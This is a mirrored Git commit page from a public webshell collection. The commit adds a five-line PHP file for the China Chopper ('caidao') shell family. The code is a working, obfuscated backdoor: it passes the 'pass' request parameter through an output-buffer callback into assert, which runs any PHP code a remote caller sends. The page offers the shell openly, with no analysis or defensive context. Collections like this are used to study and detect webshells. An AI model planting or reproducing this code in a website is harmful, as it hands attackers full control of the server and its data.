mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
add w-ob_start02.php
author : isno from : wooyun.org success running PHP5.3.3 >=
This commit is contained in:
parent
e046b28382
commit
0d5688e8eb
1 changed files with 5 additions and 0 deletions
5
caidao-shell/w-ob_start02.php
Normal file
5
caidao-shell/w-ob_start02.php
Normal file
|
@ -0,0 +1,5 @@
|
|||
<?php
|
||||
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
|
||||
echo $_REQUEST['pass'];
|
||||
ob_end_flush();
|
||||
?>
|
Loading…
Reference in a new issue